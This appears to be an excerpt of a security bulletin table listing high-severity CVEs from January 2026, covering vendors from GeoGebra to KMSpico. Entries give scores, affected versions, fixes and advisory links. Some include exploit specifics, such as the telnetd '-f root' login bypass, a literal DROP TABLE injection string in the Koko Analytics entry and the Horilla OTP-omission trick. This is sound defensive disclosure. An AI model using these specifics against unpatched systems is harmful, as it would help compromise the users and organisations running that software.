| GeoGebra--CAS Calculator | GeoGebra CAS Calculator 6.0.631.0 contains a denial of service vulnerability that allows attackers to crash the application by generating a large buffer overflow. Attackers can create a payload with 8000 repeated characters and paste it into the calculator's input field to trigger an application crash. | 2026-01-21 | 9.8 | CVE-2021-47875 | ExploitDB-49655 GeoGebra Official Homepage VulnCheck Advisory: GeoGebra CAS Calculator 6.0.631.0 - Denial of Service |
| GeoGebra--GeoGebra Classic | GeoGebra Classic 5.0.631.0-d contains a denial of service vulnerability in the input field that allows attackers to crash the application by sending oversized buffer content. Attackers can generate a large buffer of 800,000 repeated characters and paste it into the 'Entrada:' input field to trigger an application crash. | 2026-01-21 | 7.5 | CVE-2021-47876 | ExploitDB-49654 Official Vendor Homepage VulnCheck Advisory: GeoGebra Classic 5.0.631.0-d - Denial of Service |
| GeoGebra--GeoGebra Graphing Calculator | GeoGebra Graphing Calculator 6.0.631.0 contains a denial of service vulnerability that allows attackers to crash the application by inputting an oversized buffer. Attackers can generate a payload of 8000 repeated characters to overwhelm the input field and cause the application to become unresponsive. | 2026-01-21 | 7.5 | CVE-2021-47877 | ExploitDB-49653 GeoGebra Official Homepage VulnCheck Advisory: GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service |
| getwpfunnels--Creator LMS The LMS for Creators, Coaches, and Trainers | The Creator LMS - The LMS for Creators, Coaches, and Trainers plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check in the get_items_permissions_check function in all versions up to, and including, 1.1.12. This makes it possible for authenticated attackers, with contributor level access and above, to update arbitrary WordPress options. | 2026-01-20 | 8.8 | CVE-2025-15347 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4bddaefc-9ddc-4798-acb6-7b87f7c924a1?source=cve https://plugins.trac.wordpress.org/changeset/3433193/creatorlms/tags/1.1.13/includes/Rest/V1/SettingsController.php |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 11.9 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2 that could have allowed an unauthenticated user to create a denial of service condition by sending crafted requests with malformed authentication data. | 2026-01-22 | 7.5 | CVE-2025-13927 | GitLab Issue #582737 HackerOne Bug Bounty Report #3439683 https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.7 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2 that could have allowed an unauthenticated user to cause a denial of service condition by exploiting incorrect authorization validation in API endpoints. | 2026-01-22 | 7.5 | CVE-2025-13928 | GitLab Issue #582736 HackerOne Bug Bounty Report #3439441 https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.6 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2 that could have allowed an individual with existing knowledge of a victim's credential ID to bypass two-factor authentication by submitting forged device responses. | 2026-01-22 | 7.4 | CVE-2026-0723 | GitLab Issue #585333 HackerOne Bug Bounty Report #3476052 https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/ |
| GNU--Inetutils | telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable. | 2026-01-21 | 9.8 | CVE-2026-24061 | https://www.openwall.com/lists/oss-security/2026/01/20/2 https://www.openwall.com/lists/oss-security/2026/01/20/8 https://www.gnu.org/software/inetutils/ |
| gristlabs--grist-core | Grist is spreadsheet software using Python as its formula language. Grist offers several methods for running those formulas in a sandbox, for cases where the user may be working with untrusted spreadsheets. One such method runs them in pyodide, but pyodide on node does not have a useful sandbox barrier. If a user of Grist sets `GRIST_SANDBOX_FLAVOR` to `pyodide` and opens a malicious document, that document could run arbitrary processes on the server hosting Grist. The problem has been addressed in Grist version 1.7.9 and up, by running pyodide under deno. As a workaround, a user can use the gvisor-based sandbox by setting `GRIST_SANDBOX_FLAVOR` to `gvisor`. | 2026-01-22 | 9.1 | CVE-2026-24002 | https://github.com/gristlabs/grist-core/security/advisories/GHSA-7xvx-8pf2-pv5g https://support.getgrist.com/self-managed/#how-do-i-sandbox-documents |
| gunthercox--ChatterBot | ChatterBot is a machine learning, conversational dialog engine for creating chat bots. ChatterBot versions up to 1.2.10 are vulnerable to a denial-of-service condition caused by improper database session and connection pool management. Concurrent invocations of the get_response() method can exhaust the underlying SQLAlchemy connection pool, resulting in persistent service unavailability and requiring a manual restart to recover. Version 1.2.11 fixes the issue. | 2026-01-19 | 7.5 | CVE-2026-23842 | https://github.com/gunthercox/ChatterBot/security/advisories/GHSA-v4w8-49pv-mf72 https://github.com/gunthercox/ChatterBot/pull/2432 https://github.com/gunthercox/ChatterBot/commit/de89fe648139f8eeacc998ad4524fab291a378cf https://github.com/gunthercox/ChatterBot/releases/tag/1.2.11 https://github.com/user-attachments/assets/4ee845c4-b847-4854-84ec-4b2fb2f7090f |
| h2o--quicly | Quicly, an IETF QUIC protocol implementation, is susceptible to a denial-of-service attack prior to commit d9d3df6a8530a102b57d840e39b0311ce5c9e14e. A remote attacker can exploit these bugs to trigger an assertion failure that crashes process using Quicly. Commit d9d3df6a8530a102b57d840e39b0311ce5c9e14e fixes the issue. | 2026-01-19 | 7.5 | CVE-2025-61684 | https://github.com/h2o/quicly/security/advisories/GHSA-wr3c-345m-43v9 https://github.com/h2o/quicly/commit/d9d3df6a8530a102b57d840e39b0311ce5c9e14e |
| HackUCF--OnboardLite | OnboardLite is a comprehensive membership lifecycle platform built for student organizations at the University of Central Florida. Versions of the software prior to commit 1d32081a66f21bcf41df1ecb672490b13f6e429f have a stored cross-site scripting vulnerability that can be rendered to an admin when they attempt to migrate a user's discord account in the dashboard. Commit 1d32081a66f21bcf41df1ecb672490b13f6e429f patches the issue. | 2026-01-19 | 7.3 | CVE-2026-23880 | https://github.com/HackUCF/OnboardLite/security/advisories/GHSA-93w8-83cg-h89g https://github.com/HackUCF/OnboardLite/commit/1d32081a66f21bcf41df1ecb672490b13f6e429f |
| HAMASTAR Technology--MeetingHub | MeetingHub developed by HAMASTAR Technology has an Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit Absolute Path Traversal to download arbitrary system files. | 2026-01-22 | 7.5 | CVE-2026-1330 | https://www.twcert.org.tw/tw/cp-132-10650-a5ee9-1.html https://www.twcert.org.tw/en/cp-139-10651-ff09c-2.html |
| Hasura--GraphQL | Hasura GraphQL 1.3.3 contains a remote code execution vulnerability that allows attackers to execute arbitrary shell commands through SQL query manipulation. Attackers can inject commands into the run_sql endpoint by crafting malicious GraphQL queries that execute system commands through PostgreSQL's COPY FROM PROGRAM functionality. | 2026-01-21 | 9.8 | CVE-2021-47748 | ExploitDB-49802 Hasura GraphQL Engine GitHub Repository VulnCheck Advisory: Hasura GraphQL 1.3.3 - Remote Code Execution |
| Hestia Control Panel--Hestia Control Panel | Hestia Control Panel 1.3.2 contains an arbitrary file write vulnerability that allows authenticated attackers to write files to arbitrary locations using the API index.php endpoint. Attackers can exploit the v-make-tmp-file command to write SSH keys or other content to specific file paths on the server. | 2026-01-21 | 8.8 | CVE-2021-47871 | ExploitDB-49667 Hestia Control Panel Official Homepage Hestia Control Panel GitHub Repository VulnCheck Advisory: Hestia Control Panel 1.3.2 - Arbitrary File Write |
| HI-REZ STUDIOS--HiPatchService | Hi-Rez Studios 5.1.6.3 contains an unquoted service path vulnerability in the HiPatchService that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted path during system startup or reboot to inject and run malicious executables with LocalSystem permissions. | 2026-01-21 | 7.8 | CVE-2021-47862 | ExploitDB-49701 Hi-Rez Studios Official Homepage VulnCheck Advisory: Hi-Rez Studios 5.1.6.3 - 'HiPatchService' Unquoted Service Path |
| Hibernate--Hibernate | A flaw was found in Hibernate. A remote attacker with low privileges could exploit a second-order SQL injection vulnerability by providing specially crafted, unsanitized non-alphanumeric characters in the ID column when the InlineIdsOrClauseBuilder is used. This could lead to sensitive information disclosure, such as reading system files, and allow for data manipulation or deletion within the application's database, resulting in an application level denial of service. | 2026-01-23 | 8.3 | CVE-2026-0603 | https://access.redhat.com/security/cve/CVE-2026-0603 RHBZ#2427147 |
| HID Global--ActivIdentity | ActivIdentity 8.2 contains an unquoted service path vulnerability in the ac.sharedstore service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path in C:\Program Files\Common Files\ActivIdentity\ to inject malicious executables and escalate privileges. | 2026-01-21 | 7.8 | CVE-2021-47859 | ExploitDB-49703 HID Global Official Website VulnCheck Advisory: ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path |
| Honeywell--WIN-PACK PRO | WIN-PACK PRO 4.8 contains an unquoted service path vulnerability in the GuardTourService that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted path in C:\Program Files <x86>\WINPAKPRO\WP GuardTour Service.exe to inject malicious code that would execute during service startup. | 2026-01-21 | 7.8 | CVE-2021-47866 | ExploitDB-49690 Honeywell Product Webpage VulnCheck Advisory: WIN-PACK PRO 4.8 - 'GuardTourService' Unquoted Service Path |
| Honeywell--WIN-PACK PRO | WIN-PACK PRO 4.8 contains an unquoted service path vulnerability in the WPCommandFileService that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\Program Files <x86>\WINPAKPRO\WPCommandFileService Service.exe to inject malicious code that would execute with LocalSystem permissions. | 2026-01-21 | 7.8 | CVE-2021-47868 | ExploitDB-49692 Honeywell Product Webpage VulnCheck Advisory: WIN-PACK PRO 4.8 - 'WPCommandFileService' Unquoted Service Path |
| horilla-opensource--horilla | Horilla is a free and open source Human Resource Management System (HRMS). In version 1.4.0, the OTP handling logic has a flawed equality check that can be bypassed. When an OTP expires, the server returns None, and if an attacker omits the otp field from their POST request, the user-supplied OTP is also None, causing the comparison user_otp == otp to pass. This allows an attacker to bypass two-factor authentication entirely without ever providing a valid OTP. If administrative accounts are targeted, it could lead to compromise of sensitive HR data, manipulation of employee records, and further system-wide abuse. This issue has been fixed in version 1.5.0. | 2026-01-22 | 8.1 | CVE-2026-24038 | https://github.com/horilla-opensource/horilla/security/advisories/GHSA-hqpv-ff5v-3hwf https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 |
| HTC--IPTInstaller | HTC IPTInstaller 4.0.9 contains an unquoted service path vulnerability in the PassThru Service configuration. Attackers can exploit the unquoted binary path to inject and execute malicious code with elevated LocalSystem privileges. | 2026-01-25 | 7.8 | CVE-2020-36933 | ExploitDB-49006 HTC Official Latin America Homepage VulnCheck Advisory: IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path |
| hwk-fr--Advanced Custom Fields: Extended | The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 0.9.2.1. This is due to the 'insert_user' function not restricting the roles with which a user can register. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. Note: The vulnerability can only be exploited if 'role' is mapped to the custom field. | 2026-01-20 | 9.8 | CVE-2025-14533 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d44f8af2-3525-4b00-afa8-a908250cc838?source=cve https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.1/includes/modules/form/module-form-action-user.php#L636 https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.2/includes/fields/field-user-roles.php#L437 https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.2/includes/modules/form/module-form-action-user.php#L356 |
| I Want Source Codes--Digital Crime Report Management System | Digital Crime Report Management System 1.0 contains a critical SQL injection vulnerability affecting multiple login pages that allows unauthenticated attackers to bypass authentication. Attackers can exploit the vulnerability by sending crafted SQL injection payloads in email and password parameters across police, incharge, user, and HQ login endpoints. | 2026-01-21 | 8.2 | CVE-2021-47846 | ExploitDB-49761 Vendor Homepage Software Download Link VulnCheck Advisory: Digital Crime Report Management System 1.0 - SQL Injection |
| ibericode--koko-analytics | Koko Analytics is an open-source analytics plugin for WordPress. Versions prior to 2.1.3 are vulnerable to arbitrary SQL execution through unescaped analytics export/import and permissive admin SQL import. Unauthenticated visitors can submit arbitrary path (`pa`) and referrer (`r`) values to the public tracking endpoint in src/Resources/functions/collect.php, which stores those strings verbatim in the analytics tables. The admin export logic in src/Admin/Data_Export.php writes these stored values directly into SQL INSERT statements without escaping. A crafted path such as "),('999','x');DROP TABLE wp_users;-- breaks out of the value list. When an administrator later imports that export file, the import handler in src/Admin/Data_Import.php reads the uploaded SQL with file_get_contents, performs only a superficial header check, splits on semicolons, and executes each statement via $wpdb->query with no validation of table names or statement types. Additionally, any authenticated user with manage_koko_analytics can upload an arbitrary .sql file and have it executed in the same permissive way. Combined, attacker-controlled input flows from the tracking endpoint into exported SQL and through the import execution sink, or directly via malicious uploads, enabling arbitrary SQL execution. In a worst-case scenario, attackers can achieve arbitrary SQL execution on the WordPress database, allowing deletion of core tables (e.g., wp_users), insertion of backdoor administrator accounts, or other destructive/privilege-escalating actions. Version 2.1.3 patches the issue. | 2026-01-19 | 8.4 | CVE-2026-22850 | https://github.com/ibericode/koko-analytics/security/advisories/GHSA-jgfh-264m-xh3q https://github.com/ibericode/koko-analytics/commit/7b7d58f4a1838c8203cf4e7bb59847c982432119 https://drive.google.com/file/d/1HdQKf42prwrBUUG2CwbIkccTp2i6HR6d/view?usp=sharing |
| IBM--ApplinX | IBM ApplinX 11.1 is vulnerable due to a privilege escalation vulnerability due to improper verification of JWT tokens. An attacker may be able to craft or modify a JSON web token in order to impersonate another user or to elevate their privileges. | 2026-01-20 | 7.3 | CVE-2025-36418 | https://www.ibm.com/support/pages/node/7257446 |
| IBM--Concert | IBM Concert 1.0.0 through 2.1.0 is vulnerable to malicious file upload by not validating the content of the file uploaded to the web interface. | 2026-01-20 | 8.8 | CVE-2025-33015 | https://www.ibm.com/support/pages/node/7257006 |
| IBM--IBM Licensing Operator | IBM Licensing Operator incorrectly assigns privileges to security critical files which could allow a local root escalation inside a container running the IBM Licensing Operator image. | 2026-01-20 | 8.4 | CVE-2025-12985 | https://www.ibm.com/support/pages/license-service-privilege-escalation-vulnerability |
| IBM--Sterling Connect:Direct for UNIX Container | IBM Sterling Connect:Direct for UNIX Container 6.3.0.0 through 6.3.0.6 Interim Fix 016, and 6.4.0.0 through 6.4.0.3 Interim Fix 019 IBM® Sterling Connect:Direct for UNIX contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. | 2026-01-20 | 8.4 | CVE-2025-14115 | https://www.ibm.com/support/pages/node/7257143 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 7.1.2-13 and 6.9.13-38, a heap buffer overflow vulnerability in the XBM image decoder (ReadXBMImage) allows an attacker to write controlled data past the allocated heap buffer when processing a maliciously crafted image file. Any operation that reads or identifies an image can trigger the overflow, making it exploitable via common image upload and processing pipelines. Versions 7.1.2-13 and 6.9.13-38 fix the issue. | 2026-01-20 | 8.1 | CVE-2026-23876 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r49w-jqq3-3gx8 https://github.com/ImageMagick/ImageMagick/commit/2fae24192b78fdfdd27d766fd21d90aeac6ea8b8 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccMpeCalculator::Read(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 8.8 | CVE-2026-24405 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-2r5c-5w66-47vv https://github.com/InternationalColorConsortium/iccDEV/issues/479 https://github.com/InternationalColorConsortium/iccDEV/commit/d22fc174866e2521f8a5f9393fab5be306329f62 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccTagNamedColor2::SetSize(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 8.8 | CVE-2026-24406 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-h9h3-45cm-j95f https://github.com/InternationalColorConsortium/iccDEV/issues/480 https://github.com/InternationalColorConsortium/iccDEV/commit/90c71cba2c563b1f5dc84197f827540d1baaea67 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have aHeap Buffer Overflow vulnerability in the CIccTagXmlSegmentedCurve::ToXml() function. This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 8.8 | CVE-2026-24412 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-6rf4-63j2-cfrf https://github.com/InternationalColorConsortium/iccDEV/issues/518 https://github.com/InternationalColorConsortium/iccDEV/commit/2be3b125933a57fe8b6624e9dfd69d8e5360bf70 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. In versions 2.3.1.1 and below, an integer overflow vulnerability exists in icValidateStatus CIccProfile::CheckHeader() when user-controllable input is incorporated into profile data unsafely. Tampering with tag tables, offsets, or size fields can trigger parsing errors, memory corruption, or DoS, potentially enabling arbitrary Code Execution or bypassing application logic. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 7.1 | CVE-2026-24403 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-ph33-qp8j-5q34 https://github.com/InternationalColorConsortium/iccDEV/issues/505 https://github.com/InternationalColorConsortium/iccDEV/commits/d993997005449a0a6958e65b057bd25e17dff89 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. In versions 2.3.1.1 and below, CIccXmlArrayType() contains a Null Pointer Dereference and Undefined Behavior vulnerability. This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 7.1 | CVE-2026-24404 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-hqfg-45jp-hp9f https://github.com/InternationalColorConsortium/iccDEV/issues/488 https://github.com/InternationalColorConsortium/iccDEV/commit/cd637eb33f0c8055fa54d8776e00555d3d39ef0c |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have Undefined Behavior in icSigCalcOp(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 7.1 | CVE-2026-24407 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-m6gx-93cp-4855 https://github.com/InternationalColorConsortium/iccDEV/issues/481 https://github.com/InternationalColorConsortium/iccDEV/commit/881802931a71c4b0dfc28bc80ee55b2cb84dab90 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have Undefined Behavior and Null Pointer Deference in CIccTagXmlFloatNum<>::ParseXml(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 7.1 | CVE-2026-24409 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-398v-jvcg-p8f3 https://github.com/InternationalColorConsortium/iccDEV/issues/484 https://github.com/InternationalColorConsortium/iccDEV/commit/9f134c44895edd2edca4bcb97e15c0ba9aa77382 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have Undefined Behavior and Null Pointer Deference in CIccProfileXml::ParseBasic(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 7.1 | CVE-2026-24410 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-398q-4rpv-3v9r https://github.com/InternationalColorConsortium/iccDEV/issues/507 https://github.com/InternationalColorConsortium/iccDEV/commit/3cf522b13832692b107322cd51c4ae5c3a21f366 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have Undefined Behavior in CIccTagXmlSegmentedCurve::ToXml(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 7.1 | CVE-2026-24411 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-x53f-7h27-9fc8 https://github.com/InternationalColorConsortium/iccDEV/issues/499 https://github.com/InternationalColorConsortium/iccDEV/commit/d6d6f51a999d4266ec09347cac7e0930d6e02eec |
| irisideatechsolutions--Kalrav AI Agent | The Kalrav AI Agent plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the kalrav_upload_file AJAX action in all versions up to, and including, 2.3.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2026-01-24 | 9.8 | CVE-2025-13374 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5dc8feae-fc89-4152-b9b2-2b70e6ccb30b?source=cve https://plugins.trac.wordpress.org/browser/kalrav-ai-agent/trunk/kalrav-ai-agent.php#L967 https://plugins.trac.wordpress.org/browser/kalrav-ai-agent/tags/2.3.3/kalrav-ai-agent.php#L967 https://github.com/d0n601/CVE-2025-13374 https://ryankozak.com/posts/cve-2025-13374 |
| isaacs--node-tar | node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue. | 2026-01-20 | 8.8 | CVE-2026-23950 | https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6 |
| ISC--BIND 9 | Malformed BRID/HHIT records can cause `named` to terminate unexpectedly. This issue affects BIND 9 versions 9.18.40 through 9.18.43, 9.20.13 through 9.20.17, 9.21.12 through 9.21.16, 9.18.40-S1 through 9.18.43-S1, and 9.20.13-S1 through 9.20.17-S1. | 2026-01-21 | 7.5 | CVE-2025-13878 | CVE-2025-13878 https://downloads.isc.org/isc/bind9/9.18.44 https://downloads.isc.org/isc/bind9/9.20.18 https://downloads.isc.org/isc/bind9/9.21.17 |
| itsourcecode--Online Frozen Foods Ordering System | A weakness has been identified in itsourcecode Online Frozen Foods Ordering System 1.0. This issue affects some unknown processing of the file /order_online.php. Executing a manipulation of the argument product_name can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. | 2026-01-19 | 7.3 | CVE-2026-1159 | VDB-341753 | itsourcecode Online Frozen Foods Ordering System order_online.php sql injection VDB-341753 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #736332 | itsourcecode Online Frozen Foods Ordering System V1.0 SQL Injection https://github.com/YouSeeYouOneDayDayDe/Nick_1321_vuls/issues/1 https://itsourcecode.com/ |
| itsourcecode--School Management System | A security flaw has been discovered in itsourcecode School Management System 1.0. Affected is an unknown function of the file /subject/index.php. Performing a manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-19 | 7.3 | CVE-2026-1176 | VDB-341770 | itsourcecode School Management System index.php sql injection VDB-341770 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #736477 | itsourcecode School Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/32 https://itsourcecode.com/ |
| jaraco--jaraco.context | jaraco.context, an open-source software package that provides some useful decorators and context managers, has a Zip Slip path traversal vulnerability in the `jaraco.context.tarball()` function starting in version 5.2.0 and prior to version 6.1.0. The vulnerability may allow attackers to extract files outside the intended extraction directory when malicious tar archives are processed. The strip_first_component filter splits the path on the first `/` and extracts the second component, while allowing `../` sequences. Paths like `dummy_dir/../../etc/passwd` become `../../etc/passwd`. Note that this suffers from a nested tarball attack as well with multi-level tar files such as `dummy_dir/inner.tar.gz`, where the inner.tar.gz includes a traversal `dummy_dir/../../config/.env` that also gets translated to `../../config/.env`. Version 6.1.0 contains a patch for the issue. | 2026-01-20 | 8.6 | CVE-2026-23949 | https://github.com/jaraco/jaraco.context/security/advisories/GHSA-58pv-8j8x-9vj2 https://github.com/jaraco/jaraco.context/commit/7b26a42b525735e4085d2e994e13802ea339d5f9 https://github.com/jaraco/jaraco.context/blob/main/jaraco/context/__init__.py#L74-L91 https://github.com/pypa/setuptools/blob/main/setuptools/_vendor/jaraco/context.py#L55-L76 |
| JNC--IAQS | IAQS and I6 developed by JNC has a Client-Side Enforcement of Server-Side Security vulnerability, allowing unauthenticated remote attackers to gain administrator privileges by manipulating the web front-end. | 2026-01-23 | 9.8 | CVE-2026-1363 | https://www.twcert.org.tw/tw/cp-132-10652-4cdca-1.html https://www.twcert.org.tw/en/cp-139-10653-117a1-2.html |
| JNC--IAQS | IAQS and I6 developed by JNC has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to directly operate system administrative functionalities. | 2026-01-23 | 9.8 | CVE-2026-1364 | https://www.twcert.org.tw/tw/cp-132-10652-4cdca-1.html https://www.twcert.org.tw/en/cp-139-10653-117a1-2.html |
| JuneAndGreen--sm-crypto | sm-crypto provides JavaScript implementations of the Chinese cryptographic algorithms SM2, SM3, and SM4. A private key recovery vulnerability exists in the SM2 decryption logic of sm-crypto prior to version 0.3.14. By interacting with the SM2 decryption interface multiple times, an attacker can fully recover the private key within approximately several hundred interactions. Version 0.3.14 patches the issue. | 2026-01-22 | 9.1 | CVE-2026-23966 | https://github.com/JuneAndGreen/sm-crypto/security/advisories/GHSA-pgx9-497m-6c4v https://github.com/JuneAndGreen/sm-crypto/commit/b1c824e58fdf1eaa73692c124a095819a8c45707 |
| JuneAndGreen--sm-crypto | sm-crypto provides JavaScript implementations of the Chinese cryptographic algorithms SM2, SM3, and SM4. A signature forgery vulnerability exists in the SM2 signature verification logic of sm-crypto prior to version 0.4.0. Under default configurations, an attacker can forge valid signatures for arbitrary public keys. If the message space contains sufficient redundancy, the attacker can fix the prefix of the message associated with the forged signature to satisfy specific formatting requirements. Version 0.4.0 patches the issue. | 2026-01-22 | 7.5 | CVE-2026-23965 | https://github.com/JuneAndGreen/sm-crypto/security/advisories/GHSA-hpwg-xg7m-3p6m https://github.com/JuneAndGreen/sm-crypto/commit/85295a859d0766222d12ce2be3e6fce7b438b510 |
| JuneAndGreen--sm-crypto | sm-crypto provides JavaScript implementations of the Chinese cryptographic algorithms SM2, SM3, and SM4. A signature malleability vulnerability exists in the SM2 signature verification logic of the sm-crypto library prior to version 0.3.14. An attacker can derive a new valid signature for a previously signed message from an existing signature. Version 0.3.14 patches the issue. | 2026-01-22 | 7.5 | CVE-2026-23967 | https://github.com/JuneAndGreen/sm-crypto/security/advisories/GHSA-qv7w-v773-3xqm |
| KMSpico--Service KMSELDI | KMSpico 17.1.0.0 contains an unquoted service path vulnerability in the Service KMSELDI configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path in C:\Program Files\KMSpico\Service_KMS.exe to inject malicious executables and escalate privileges. | 2026-01-25 | 7.8 | CVE-2020-36935 | ExploitDB-49003 Official KMSpico Homepage VulnCheck Advisory: KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path |
